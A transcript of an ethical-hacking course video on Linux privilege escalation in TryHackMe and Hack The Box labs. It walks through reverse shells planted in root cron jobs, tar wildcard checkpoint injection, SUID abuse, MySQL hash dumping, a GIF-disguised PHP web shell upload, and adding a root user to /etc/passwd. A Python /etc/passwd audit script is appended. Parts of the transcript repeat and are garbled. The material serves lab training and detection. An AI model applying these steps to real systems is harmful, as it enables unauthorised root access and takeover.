Linux Privilege Escalation Crash Course

Captions
Hey, thanks for stopping by my channel. So in this video we're going to be covering some very basic Linux privilege escalation and enumeration. This is actually from my complete ethical hacking course; this is just kind of an introductory. I was thinking about expanding the Linux privilege escalation and enumeration portion as well as the Windows enumeration, file transfer and privilege escalation, but before I went ahead and put in all that time and effort I decided to release some small portions from that complete ethical hacking course to see if this is something that you guys are actually interested in, and add some more intermediate-level enumeration and escalation on both Linux and Windows. So if this is something that you would be interested in seeing more of, please let me know down in the comments and I will get to working on those. Now let's jump into it.

All right, we are here at TryHackMe. I've decided to come here for the Linux privilege escalation because we can pretty much do everything in one place, and we can look at some of these scans and we can see just exactly how this is going to work. So we're going to walk through quite a few of these, but we'll go ahead and we're going to look at a couple of different tools. So the first one I want to show you is going to be LinPEAS. This is a brother, or sister, however you want to look at it, to WinPEAS. So we'll just Google LinPEAS and it'll bring you to this page; it'll be the first one, so LinPEAS right here on GitHub. It's the same as before: what you do is you're going to scroll down and you're going to go to the release page. You'll click on this, I just grab the first one, so just click on this, you can click download and it will save to your downloads, and then what you'll do is you can just move it from your downloads by typing in cp and then the location, which is going to be your home. So it'd look like this: if I wanted to copy it to my desktop I would go cp, home, the machine, the downloads, and then the file, which is linpeas, and then I just put a period to copy it to my current directory, or if I wanted to copy it to a different location I would put the full path in there as well. And so you'll go ahead and copy that to your tools folder, which I have already gone ahead and done; it is right here, and so you'll want that there.

And then the other one we want is LinEnum, and we're going to look at LinEnum. I don't use this really that often, but I like to have it, and it's one I want to show because it's not going to highlight things for us and it'll be easier for us to walk through what we're looking at without LinPEAS just giving us all of the answers. So we're going to go ahead and grab LinEnum as well. You'll go ahead and you'll just type in, I typed straight into the URL, but this is the URL where you're going to go, you'll just go ahead and type in LinEnum and then you can type in this right here and it'll pull you up this GitHub page. Click LinEnum.sh; you can right-click it and go copy link location, or you can come in here and save things the way I do: I go into raw, I highlight it all with Command+A, I copy with Command+C, and then I gedit a page over here and then I paste it in. And so that's how you're going to get those. And then we're going to go back over to TryHackMe and we're going to SSH into this box. I'll have already done that, and we will begin looking at some of the privilege escalation ways in Linux.

So we are going to be talking about cron jobs. These are files that get executed every one minute, every five minutes, every day or week. I already went ahead and ran LinEnum and LinPEAS, and so here's the output for LinEnum, and we actually come up here, it actually starts up here, so it'll tell us what files are getting run daily and which ones are hourly and monthly. And then down here it actually tells us, like, we have the ability to run this, uh, a shell, /bin/bash, well, this isn't bash, this is /bin/sh, um, here through the /home/user path, and so this is in our path, we have the ability to write to it, and it'll tell us down here what each one of these stars means: so you have minute, hour, day, month, or day of week. So we have this right here; these all stars means that it runs every minute, every hour, and so on and so forth. So both of these files here, so this one is going to be in a path and this one is just a file, so we should be able to find the location of this file and then just overwrite it and be able to get a reverse shell through this, because it's being run as root. And so when root runs a file and we put in a reverse shell, when root runs the file we'll be able to set up a listener and root will reach out and we'll be able to get a reverse shell on another tab.

So that is LinEnum. We can come down to LinPEAS right here and we can actually see it lights it up for us. It says this path right here is vulnerable, these are being run as root and it's happening all the time, every minute; we have the opportunity to overwrite this file. So what we'll do is we'll see if we can find this file location, so we'll go locate and it will paste, and we'll type enter and it tells us that the file is right here. So we should be able to just go to nano and then paste this in, and this is what is being run right here: so it says /bin/bash and then it's just echoing the date and then it's going into nowhere. So we can actually just come in here and we could leave that, actually, it doesn't say, we could delete it or we could leave it, and what we want to do is put a reverse shell in here. So I shared this with you earlier, this is a place to go, PentestMonkey, and you can get reverse shells. We can just come in here, because this is running a bash script or a /bin/sh script, it's a bash, /bin/bash, you can come in here and you can paste in this bash script, and we'll go ahead and use the famous port 4444, got one too many there, and then we just put in our IP address, and I think mine is 10.2.42.96, and so that looks okay. Come over here, we will set up a netcat listener on port 4444 and we will go ahead and save this out, and when it is executed we will get a reverse shell over here. So we'll go ahead and wait for this to reach back to us and I will restart the video; it shouldn't be more than a minute. Okay, and it has reached back out and we have our root shell.

So what happens, essentially, one more time, is the server is going through and it is running these jobs every week, every month, every hour, and these ones every minute, and so because this is being run every minute or every five minutes, if you ever are doing a capture the flag or a certification or really any box and you see every minute or five minutes, you can be thinking this is probably going to be your way in, especially if LinPEAS lights it up for you. So what happens is this is being run as root, and when root runs this file and it runs our reverse shell right here, we'll go ahead and open this back up, when it runs this, essentially what it's saying is root wants to reach out to this IP address on this port and offer up a shell, a bash shell, and so when this happens we come over here and we have this shell come through, and it comes through as root because root executed our file. And with that, we'll see you in the next cron job video.

All right, the next video is going to be covering the cron job wildcards. These are ones that I see a whole lot less, but it is one that you should be aware of nonetheless. And one helpful tool that I forgot to mention to you guys, it'll be linked over in the course resources of this video, is right here, GTFOBins. So you can just delete this and save GTFOBins. It is a really helpful place to go, especially when you're trying to do privilege escalation, and in this specific one it actually tells us that we can break out of a restricted environment by spawning an interactive shell. And so we saw from our LinPEAS and/or LinEnum that we have this file running right here, and so what we can do is actually come in here, we can copy this, I'd have a space there at the end, we can copy this and we can cut this out so we can see what's going on, and this is where I come up with the tar, so that we can go and check this out on GTFOBins, and it will actually tell us what we need to run in order to get this to work.

So what we're going to do is we are going to come back here and we're going to need a reverse shell payload. So one of the things that I showed you earlier is when we make these we make them right here with msfvenom, and so we can go ahead, and I'll go ahead and run that, so the way we have it. But what you need to know when you are making one of these, and where I got this, is right here: we go into our Linux, and because this is a Linux box and we're making it a payload with msfvenom, we need to just copy this and then you change your port, you change your IP address and then you set up the shell you want. But what's different here versus the web payloads is we actually need to have the right architecture, and if you saw, we're running an x64; if you try and run this as an x86 it is not going to work. And the way you find that is by typing in a uname -m, so you type in uname -m and it'll tell us this x86_64, and if you didn't know what this was you could just copy this, paste it into Google and it will tell you. But for our sake we're going to be needing to run x64, not x86. So that's how we come up with the type of payload that we're going to be generating, and I went ahead and already pre-filled out everything so that we would have it.

And now what we'll do is we need to transfer this over to our vulnerable server. So we'll come over here, we are in the home directory and we're going to run a wget, and we're going to run it on my IP address, http://10.2.42.96, and then we're going to slash, and we're going to call this shell.elf. And we will need to start up a server so that we can transfer this file, and we're going to do that with sudo python2 -m SimpleHTTPServer, and we're going to put that on port 80, and we're going to type in the password, and now we have this up and running. We're going to go ahead and get this, and it has grabbed it. And so what we'll need to do now is make this executable, and we need to do that with a chmod, and then we can go +x and then we can just type in the payload right there. And now what we also are going to have to do is we're going to have to make a checkpoint for the server to know where to look in the path for this file. So we'll go touch, and we're going to slash home user, and then we'll go --checkpoint=1, make sure that looks right, it does. Then we'll go touch /home/user/check, checkpoint, I spelled that wrong, --checkpoint-action=exec=, and this is to execute our file, and that looks okay. So now what we're going to do is we're going to have to come back over here, we'll close out of that, we can set up the netcat listener that we had running earlier on port 444, because that's the port we set it up on, and now this should execute and I'll bring you back whenever it has. Oh, it already has come back, and there is our shell. That is the cron job wildcard; it's a little confusing, um, but just watch this a few times and then maybe we'll practice it later on in this course and it won't be so confusing. And with that, I'll see you in the next lecture.

All right, there is one way of privilege escalation that I want to show you guys that you will see in the future, one that you'll need to know, and that is through MySQL. So we actually have MySQL here. One thing to always check is your history, so when you come onto a box you can type in history, and we actually see we have mysql, some localhost, user, password123. So what you can do is type it in this way, so we just use mysql -u root, and we are here in the MySQL database. And so what we'll do is go show databases; and you can save these in your notes, pretty much just like this, and then we'll use mysql, or we'll use whatever database seems interesting, and then we can show tables, forgot my semicolon there; so if you hit this arrow it's because, uh, you need a semicolon to close off your SQL query. And then you can look through here and you can go through all these files and see what looks interesting to you. Uh, this looks interesting, the databases, but we're going to go into the users; probably 90% of the time or more you're going to want to go into the users. And so you can actually come in here and we'll just select all, and some of this should look familiar from the SQL injection: select * from user; and this actually gives us a very non-pretty version of the user and the password. There's another way to do this: we can go select, and then we'll go user, because remember we're looking for the user inside the table, which we actually have mysql here, so we're going to be inside this user. We're going to go select user, and then inside the user, I'll show you, actually, it looks like this, describe user; so inside the user column we want to find the user and the password. So what we're going to end up typing in is select the user and the password, and it's going to be from the table user, select user, password from user; and then when we close that off and we hit enter it makes it look a whole lot prettier. So sometimes you'll come in here and you'll have users and there'll be plaintext passwords, but most of the time you're going to have something like this and you're going to have to try and crack this password. But this is helpful, you're going to need to know it, you're going to come across it in the future, so remember that you can just type it in this way and you can have the very non-pretty version, or you can go about it and grab the passwords this way. I'd go ahead and save those SQL commands because you're going to need them in the future, unless you know SQL really well or you are up for the challenge of Googling in the future, or I guess you don't have to save them and you can just refer to this video. Either way, you're going to need to know that MySQL is something you need to look through in the future, and it's something you should always be ready to check, and I'll see you in the next video.

All right, in this video we're going to be going over some password hunting within Linux. This is something that some of the tools will cover for us, but it's always best to try and do it manually, especially if you get stuck at a dead end. And what we are going to do here is, we're at PayloadsAllTheThings, what you'll do is you'll just come over here and you can copy these and you can just paste them straight into the box that you have a shell on, and you'll go ahead, paste it and hit enter, and see if any files come back that look interesting. And we can go ahead, like some of these I'm pretty sure are actually available on this specific box, so what you'll do is you'll come over here, you just hit enter, and there they are, and you can actually, since these are just files, you can copy these and you can look and see what's inside of them. We are going to continue with this password hunting. Password hunting isn't the only thing you want to hunt for; this right here, these SSH keys, is definitely something that you need to be aware of. You will come across these in the future, but sometimes you're going to go like that, you'll paste it in and nothing's going to come back, and it's because the key is not actually named id_rsa. Most often that's what it's going to be called, but in this specific case it is actually called root_key. Yep, and there it is. And so we can actually go into where this file is, and we can cd /.ssh, and then the file should be right here. And what we'll do is we'll go chmod, and then we type in, or sorry, root_key, and boy, I'm really struggling, chmod, and then we need 600 so that we can use this key, and it says changing permissions of the key is not permitted. And we can go ahead and see if this will actually work anyway: we can go ssh -i root_key and then we'll go root@ and then we put in whatever IP address we're trying to SSH to, and in this case it's 182.85, and we can go ahead and hit enter, and it says do you want to fingerprint the box, we say yes, and we are root. Most of the time you are going to have to chmod 600 this; I'm not sure why that didn't work in this case, but that is how you would go about finding an id_rsa key and SSHing into the box. And you'll also want to remember and put in your notes or in your workflow password hunting. So with that, I will see you in the next video.

Okay, we are going to be talking about SUIDs, or the setuid. These are going to be something you're going to see, but they're not as straightforward as you might hope. Every single SUID I have ever come across has taken me more time than I think it should, because when you think about it and you go to GTFOBins they look really easy, but every single time, every payload I've ever had to deal with has required some kind of modification or wasn't as straightforward as I had hoped. So these are something you're going to see in the future. So if you come over to PayloadsAllTheThings, the SUID is right here, and it tells us it stands for set user ID. So the way we find these, LinPEAS and LinEnum both will find these, but you can also just come in here and you can copy, you can paste and you just press enter, and it will pull them down for us. So when you do this it's going to look like this. This is what we're looking for, this s right here; we're looking for the sticky bit, and the sticky bit will be right here, and this is for the root user, so the root user has read/write access and then the s is enabled. So when we see something like a chmod 777 and then file here, what's happening is they're changing this to read, write, execute all the way across for the root user, the group users and the local user. So it would be a seven here; this would be four bits, so if you saw something like this, 477 it would be, or a 444, what you'd be enabling is the read access, and then this would be the two bits, which is the write access, and you would see something like a 6, so like when we see the chmod 600, and then when you see all sevens it would be read, write, execute all the way across. And so this is what we're looking for right here, this s, and then if it was a GUID this would be a g and this would be a t, but really what we're looking for right now is just the s-u-i-d. So we're looking for this one right here, for this sticky bit. And what we'll do when you come across these, the way you enumerate these, LinPEAS is the best because it's going to just highlight it, it'll just highlight if one is vulnerable, but you might have to come across, um, manual enumeration at some point and LinPEAS isn't going to find it. So what you do when you enumerate these is, eventually you'll get used to just seeing them and you'll know what's there, but you come over to GTFOBins, you'll go to SUID, you will click on this, and then what you do is you just look for, you can go straight down and you can go chsh, and you can come down here and you can just look for c-h-s-h, and then you can go okay, that's not in here. We can look for sudo, I know plain sudo's not in here, I think sudo might be in here with an extension, nope, see, so I still have to come here and look through these, and you will probably too. So we can go through and you can look for these, and then when you find one and you click on it, it will tell you how to carry out the execution for getting the file you need or to get root access. That is the SUID. We're going to go ahead and jump into a box that has an SUID in it, and you can go ahead and try and do the foothold on your own and we can work on the privilege escalation together, or you can just follow along through the whole thing. I will see you in the next video.

Okay, we are back and we're going to be doing a box from Hack The Box. It is called Bank, and so you can go ahead and connect to Hack The Box and launch the box, and so you can connect and you can begin with your nmap scan. But before we do, I want to challenge you guys to go ahead and try this box on your own. We've covered everything necessary to gain a foothold, and I just want to give you a tip: it's going to be a little more enumeration than what you might think when you first try to do your enumeration on this web server here. But before you go ahead and begin this box, there's one thing that I want to cover. Sometimes when you're doing Hack The Box machines, because we're working in a virtual environment, they label their web servers, not always but sometimes, with a .htb. Normally if you're out in the real world you're going to come across .com, .net, .org, .gov, things like that, but because they have linked their web server to .htb we're going to have to add that to our /etc/hosts file. And just a heads up, sometimes when you come out and you do boxes on your own and you're trying to work through Hack The Box on your own, when you come to a web page and you type in the IP address, normally when you need to add it to your /etc/hosts file is when it doesn't render, so usually it won't render anything. In this case it's a little more tricky because the page actually does render. But what we'll have to do to go through and do this, we'll type in sudo gedit /etc/hosts and you'll hit enter right here, and so enter this and we can type in our password, okay, and here we are, and what you'll do is you'll type in 10.10.10.29 bank.htb and you will save this. One thing to remember is, when we have port 53 open, to go ahead and enumerate it. We actually did not cover the way to enumerate it that works on this box, because we used, I believe, nslookup and dnsrecon, but what actually works on this box is a dig axfr bank.htb @10.10.10.29. And so when you run this, um, I'll actually go ahead and run it, remember to add this into your notes, uh, it's another way to enumerate port 53 and look for additional pages for us to add to our /etc/hosts file in this case, or to go out and look at. So if you wanted to be really thorough in your editing your /etc/hosts, you would go in and you would add bank.htb, chris.bank.htb, and you would even add this ns.bank.htb, and you just go through and add all of these. In this case, uh, bank.htb will get us everything we need, but I thought I'd go ahead and show this to you so that you would be ready in the future and you wouldn't be caught off guard when you see it. So I'm going to go ahead and give you the challenge to try and solve this box on your own. We've covered the privilege escalation, we've covered the foothold already in this course, so I'll go ahead and, if you want, you can pause the video now and give this a try, or you can continue along the video and follow along.

So we'll go ahead and we'll go bank.htb, and this brings us to a web page, and what you can do here is you can go ahead and try SQL injection, you can launch sqlmap, which is something you can't use, really, you shouldn't use it in a real-world pentest, you definitely cannot use it on a bug bounty, and you're not allowed to use it in a lot of certifications, so we're not going to mess with it at this point. But what we're going to do is we're going to go ahead and start our gobuster, and because we see this .php, what we're going to do is we're going to go with our gobuster. And so we'll come over here, we'll just open up a new tab, we'll type, uh, gobuster dir, uh, we don't do a dash there, we go dir -u http://bank.htb, um, rather than the IP address, we're going to go with our wordlist, and this is where I think it gets a little tricky, because you will have to use a different wordlist than what we've been using. You can go out and grab the SecLists wordlist, uh, that's the one I usually use when I'm trying to find directories, but in this case I have one that I've actually modified, so we'll go ahead and go, I think it's going to be /home/kali/Desktop/tools, and I called it just wordlist.txt. So go ahead and run that, and it's going to start pulling down directories for us and pages for us to go ahead and look at. Right away we can go try and see what these render, go ahead and see where this takes us, and we get this login page, which doesn't really look like it's going to do us any good. This is also at the bank login; let's go ahead and delete this and see if we get anything different, and we hit this forbidden page. One thing I have not tried but I am curious, now that we see this forbidden page, is to run this and to intercept this, forward, let's put in a 200, okay, and see what happens. Okay, still tells us the same thing, so we'll come in here, we'll come back, and this right here looks interesting, so we'll go ahead and check this out: bank transfer, that sounds like something you don't want someone to be able to see. That does not work, so what we'll do is maybe we do need to go over here and edit our /etc/hosts file. I thought we could get away without adding these in, so we'll go ahead and add this, paste, and we can add this, paste, and we'll go ahead and add this one and we'll paste, and we'll save that, and we will try and come back here to this and we will type in /balance-transfer. Okay, so we do need those in there. Now it brings us to this page with all of these files, and so what we can do is, I have come to pages before similar to this, um, not quite this extensive, but pretty extensive, and I went through and looked at every single one of these before I was able to find the vulnerability. But in our case when we look at this we can just see these are all pretty similar in size, and so what I would do is I would just look at one that's got a 583, a 584 and a 585, because it's probably going to be pretty much all the exact same files, and if you do look at one of those it just turns out to be something that's encrypted. And here's one that is different, and so what we'll do is we'll go ahead and click on this, we will click save file and it will save to our downloads.

So what we can do is cd over to our downloads and then we'll cat this file out and see what is inside of it, and what we end up with is an email and a password. So remember that login page that we started at; we can try that. SSH is also open, and whenever I find credentials that's probably where I'm going to go first, is I'm going to try and SSH into the box, and that is not going to work. So then we'll go back to our login page, and what we will do is just copy this, paste it in, we will copy this and we will paste it in, we will submit, we will not save. So when we come to a web page the first thing we automatically do is we start clicking around. That doesn't do us any good, and you click to see if you can do anything; this would be terrible if you found this in real life for whoever you're testing. And then we come over to support and then we're brought to this page and it has a file upload, and whenever you see file upload you can automatically just start trying to upload different files. You can try documents, you can try PNGs; for us we would want to try a PHP, especially since it's running PHP, to see if we can get a reverse shell. So what we'll do is we can come in here, we can upload a file, so we can go ahead and try this, and we will want to turn on our interceptor, and we will type in test, type in test, we'll choose the file, we'll go ahead and submit, we go forward, forward, oh, I just forwarded past it. Okay, says it was a success, that's a good thing. We can come in here and we'll just type in file this time, and we'll go file, we'll choose our file, pick our GIF, we will turn intercept back on and hit submit, and we are brought to this page. We're going to send it to Repeater and we'll go ahead and send that on its way, and since we already know this works we can send this and see the response. We can render the response, you can look over here and it says it was a success. So we can come back over here, and if you look through here we will see what it tells us: we have this comment here that actually tells us what we need to do next. So this is something you're probably not going to see in real life, but it's something that they've gone ahead and done on a Hack The Box, is it says I added the file extension .htb to execute as PHP. So what happens is, if we change to this, what we'd want to do if we're trying to upload a reverse shell is we would change this to .php, but in this case it says PHP is blocked but we can use .htb. And so the next thing we need to do is, if you just try to upload a PHP shell, and I'm telling you this just to save time, it's not going to work, but we need to trick the server into thinking that we are uploading a PHP shell, and I have a gigantic GIF here that is going to take a second for me to highlight and then delete, so I'll just bring you back once this is deleted. Okay, now that we have that all deleted, the reason we kept this right here is because it'll tell the server that we're uploading an image, and that's what we need to do in order to bypass the filter. And so you can actually just go out to Google and just type in pretty much anything .gif and then go to images and just download a GIF so that you can do this, or you can make a file and you can just make this the beginning of the file and save it and then upload that, instead of doing what I just did and deleting all of that mumbo jumbo. But we'll go ahead, since we've already deleted it and this file is already here, so we'll call this htb.htb so that way it will execute as PHP. And we have seen this before, we'll come up here and we're going to go SecLists, okay, and we're going to go Web-Shells, we're going to grab this web shell that we have used in the past, that is not what I needed, I need this, I need this, and we're going to come over here and we are literally just going to paste that in, and then I'm going to change the name to file1 so that way we have it, and we'll send it. It tells us that went through, so now what we need to do, let's, we'll actually just refresh this page and we'll resend it. Okay, we have file1, this is the one we used, we'll click on it, it takes us to the page, and if you remember how web shells work, we just type in ?cmd, for the command, which was the variable we decided to use, and then a command, whoami, and this should execute. We are www-data.

Since we have command execution on this box we can go ahead and delete that; we will grab a reverse shell from a reverse shell cheat sheet. I actually tried to run a python, so a Python shell, so I typed in which python, sent it, it says we have Python; I still could not get the Python shell to run. I also tried bash and I couldn't get that to work, so what I did is I went, um, and I tried Python and I tried bash, I skipped PHP and I decided to go straight for netcat. So this was actually the third one that I tried, and we'll go back over here, just type this in, and what I am going to do is I'm just going to leave this as 1234 because I don't really want to have to delete it, 10.10.14.15. If you remember how this works, we will need a netcat listener, so we'll just go nc -lvnp 1234, or whatever port you decided to roll with, we will send that, and it did not hang, so something didn't work. Okay, I wasn't listening, we'll send it again and let's check our shell. It says it connected, so if we go id or whoami it says we are connected to this box. So now what I like to do is I like to have a full interactive shell, so you can go ahead and type in python, because we already checked which python, -c, and I don't know if we've seen this before, but it just gets us this little prompt right here, so we can go import pty, don't need a dash, pty.spawn and then we come here, /bin/bash, and then close this off, and we now have this right here. But for editing purposes later on in the video, because we're going to have to edit some files, if you just try to edit a file exactly how this is it doesn't work, you have a mess and it is really quite difficult. You can get around it by importing files and I can show you guys how to do that later, but I'm going to go ahead and, if you hit Command+Z, actually, I'll just show you. So we ls, if I try to type in gif and I hit tab, nothing works, and it makes it really difficult to edit files inside some boxes. So we're going to go ahead and hit Command+Z, we're going to type in stty raw -echo, and then we'll have this little colon here, and then the fg just brings us back into the box, so you can hit enter and then you have to hit enter again, and now if we type in gif and we hit tab it works, and it also makes it so we can edit files.

So I want you to go ahead and see if you can figure out the privilege escalation on this video on your own. So go ahead and see if you can pull over LinPEAS and run it and find the vulnerability. Okay, how did that go? I'm going to go ahead and cancel this, we're going to go ahead and cd over to Desktop/tools, we're going to need a simple server, and now we have this launched we can grab LinPEAS onto our box. So we can go ahead and go, um, wget and then we can type in our IP address and then we're going to type in linpeas.sh, and that should grab. We can bash linpeas.sh and we'll run that. All right, instead of reading through this LinPEAS file here, you're going to see that this box is actually vulnerable to several different vulnerabilities that we have in fact covered, so you can go ahead and do those on your own, but we are just coming out of the SUID privilege escalation and I want to cover that. So this doesn't actually pick up on the SUID vulnerability, and so what we're going to have to do is we're going to come all the way down here to our command prompt, we're going to go to our PayloadsAllTheThings, we're going to copy this and paste this in. The reason I want to cover this is because I told you that these are not always that obvious, so LinPEAS doesn't even pick it up because it doesn't recognize this, and also we are going to see one that isn't how you would cover it here in the GTFOBins. So this one is a little bit different than what we have seen already, and honestly every SUID I have come across is not common, like they're all different and they all require some Googling. And so when I originally did this with the SUID is I copied this and I typed in cat and then I pasted it in, and we can go ahead and do that; it just gives us back a bunch of illegible stuff, and so I didn't know exactly what this was doing. So I ended up coming in here and I just tried to execute this file, and if you look, and we go whoami, we are now root. And so SUIDs are a bit tricky, they're not always straightforward, and this one is no exception; it is not how you would expect it to be. And so that is the SUID vulnerability in this box. You can change the password to the /etc/passwd file, and I would challenge you to go ahead and do that; it is a little tricky on this box, so it may take a few tries. And with that, I will see you in the next video.

All right, we are going to go ahead and shoot the /etc/passwd video. I decided to go ahead and make this video because I was kind of having a little bit of trouble with it myself, getting it to actually load, so I want to walk you through exactly how to go ahead and get that done. And also, while we're here, if you remember, the way we uploaded this file was we went ahead and put something in here, put something in here, we chose a file and then we did a GIF, and then we just saved those first few characters and then put in our web shell right here. So I actually decided to go ahead and show you another way to do this; you can actually, it's a way faster way too, you can make your own file just like this. We'll go ahead and we'll cut this out, we just need the GIF87a and then the web shell, and we just saved it as .htb so that way it would execute the PHP code, if you remember the note we found inside the box, a little clue. And now we don't have to mess with Repeater, we don't have to put this inside Burp
one that isn't how you would cover it here in the GTFO bins so this one is a little bit different than what we have seen already and honestly every suid I have come across is not common like they're all different and they all require some Googling and so when I originally did this with the suid is I copied this and I typed in cat and then I pasted it in and we can go ahead and do that it just gives us back a bunch of unledgeable stuff and so I didn't know exactly what this was doing so I ended up coming in here and I just tried to execute this file and if you look and we go where am I we are now root and so suids are a bit tricky they're not always straightforward and this one is no exception it is not how you would expect it to be and so that is the suid vulnerability in this box you can change the password to the Etsy pass WD file and I would challenge you to go ahead and do that it is a little tricky on this box so it may take a few tries and with that I will see you in the next video all right we are going to go ahead and shoot the Etsy pass WD video I decided to go ahead and make this video because I was kind of having a little bit of trouble with it myself getting it to actually load so I want to walk you through exactly how to go ahead and get that done and also while we're here if you remember the way we uploaded this file was we went ahead and put something in here put something in here we chose a file and then we did a gif and then we just saved those first few characters and then put in our web shell right here so I actually decided to go ahead and show you another way to do this you can actually is a way faster too you can make your own file just like this we'll go ahead and we'll cut this out we just need the GIF 87a and then the web shell and we just saved it as htb so that way it would execute the PHP code if you remember the note we found inside the Box a little clue and now we don't have to mess with repeater we don't have to put this inside burp 
we don't have to delete those characters we can just upload this straight away so we can just choose this file and upload it and submit and it goes right through and we can come over here and we can type in CMD who am I and we get ww data so we can go ahead and delete this and upload our netcat shell for this and I guess we'll just delete all that go 10 14 15 or we'll just make it one two three and then we need to set up our netcat listener so that we can get a uh call back on our box here we'll go ahead and hit enter not sure what went wrong just try it again and 10. 14. 15. let's go ahead and send that that time it looks like it's hanging if you remember we need to type in Python Dash C import BTY PTY dot spawn and whoops we'll need Ben bash and then close all this out looks good and now if you remember we need to come over here and we hit command Z to put that in the background and then we type in stty raw minus Echo and then the FG and then we'll hit enter and then we'll hit enter again and that's very important to getting this to work because without that I really was struggling to edit the Etsy pass WD file so what we'll do is we'll go ahead and we'll cat the Etsy pass WD we are going to copy all of this so that way we have it just so that way we are used to having this in best practice just in case we screw it up we have it here and we can save it right here we'll go g edit and we can type in um we'll just type save it as pass WD paste that in there and we're going to go ahead and copy this root and we're going to make a new one hit enter and if you remember we need something to go right there our new password so we'll come back over here we type in open SSL pass WD password is pass hit enter it gives us a new password we copy it we replace it with this X we're going to copy this copy okay now here comes the tricky part we're going to go ahead and do Vim and we're going to go Etsy pass WD hit enter and we're going to go ahead and because I don't really care 
to mess this up too much because it's just a regular practice box we can come up here we can hit enter we're going to paste in our new box our new user and you can see nothing showed up here except for this T so what actually ends up happening is we need to hit Escape in order to close out and then we put our colon in and then we go W exclamation point to overwrite it and now it's overwritten but the problem is I'm not able to get out of here so we have to just go ahead and close that and we have to make a new tab we have to set up a new netcat listener and reconnect and actually I think this is over here I'm just going to copy this so I don't have to retype it in paste enter and now we should be able to cat the Etsy pass WD here's our new user it just saved as T because root didn't get all the way in there so we can just switch users to T and then we'll type in the password that we made and we are now root so that is a kind of difficult way to get the Etsy pass WD file overwritten for some reason I no matter what I did I was unable to write that the correct way into the past WD file and I had to come over and make my own copy it paste it in and it always deleted the first few characters of root and this time we luckily had just the tea left over but that is one way to go ahead and overwrite the Etsy pass WD file so I hope you were able to get this on your own if not you can go ahead and try it again because you're surely going to see this again in the future
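The /etc/passwd edit at the end of the video leaves a recognisable trail: a second UID-0 account, a password hash sitting in the second field of /etc/passwd instead of the usual "x" placeholder, and (when the paste goes wrong, as it did here) a malformed line. The following is an added example, not code from the video or from any tool it shows: a small Python audit that parses passwd-format text and reports those indicators. The sample file content is constructed for the demo and the hash in it is a labelled placeholder, not a real hash.

```python
"""Audit /etc/passwd content for indicators of the tampering shown above.

Added example (not from the video). It flags:
  - accounts other than root that have UID 0,
  - a password hash stored in /etc/passwd (second field) instead of
    the shadow placeholder "x" or a lock marker ("*", "!"),
  - an empty password field (login without a password),
  - malformed entries that do not have the seven colon-separated fields,
    such as a line truncated by a bad paste into vim.
"""
import sys
from dataclasses import dataclass
from typing import List

# Constructed sample: a passwd file after an edit like the one in the video.
# The "t" line is the planted UID-0 user; its hash is a placeholder string.
# The last line is a truncated entry with only three fields.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
t:$1$PLACEHOLDER$constructedhashNOTreal:0:0:root:/root:/bin/bash
brokenline:x:1000
"""

# Values that legitimately appear in the password field of /etc/passwd.
SHADOW_PLACEHOLDERS = {"x", "*", "!", "!!"}


@dataclass
class Finding:
    line_no: int
    user: str
    reason: str


def audit_passwd(text: str) -> List[Finding]:
    """Return one Finding per suspicious property of each passwd entry."""
    findings: List[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(Finding(line_no, fields[0],
                                    f"malformed entry: {len(fields)} fields, expected 7"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if not uid.isdigit():
            findings.append(Finding(line_no, name, f"non-numeric UID {uid!r}"))
            continue
        if int(uid) == 0 and name != "root":
            findings.append(Finding(line_no, name, "UID 0 account other than root"))
        if pw == "":
            findings.append(Finding(line_no, name, "empty password field (no password required)"))
        elif pw not in SHADOW_PLACEHOLDERS:
            findings.append(Finding(line_no, name,
                                    "password hash stored in /etc/passwd instead of /etc/shadow"))
    return findings


def uid0_accounts(text: str) -> List[str]:
    """Names of all well-formed entries with UID 0 (root should be the only one)."""
    names = []
    for raw in text.splitlines():
        fields = raw.strip().split(":")
        if len(fields) == 7 and fields[2].isdigit() and int(fields[2]) == 0:
            names.append(fields[0])
    return names


if __name__ == "__main__":
    # Usage: python audit_passwd.py [/etc/passwd]; without a path it audits the sample.
    source = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for f in audit_passwd(source):
        print(f"line {f.line_no}: {f.user}: {f.reason}")
    print("UID 0 accounts:", ", ".join(uid0_accounts(source)))
```

Run it against the real file on a host you administer and compare the UID-0 list with what you expect; a hash in the second field is also worth correlating with the file's mtime, since a legitimate passwd edit normally touches /etc/shadow rather than putting a hash here.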
Info
Channel: Ryan John
Views: 16,389
Id: t_1v5G_uKqw
Length: 50min 10sec (3010 seconds)
Published: Tue Nov 22 2022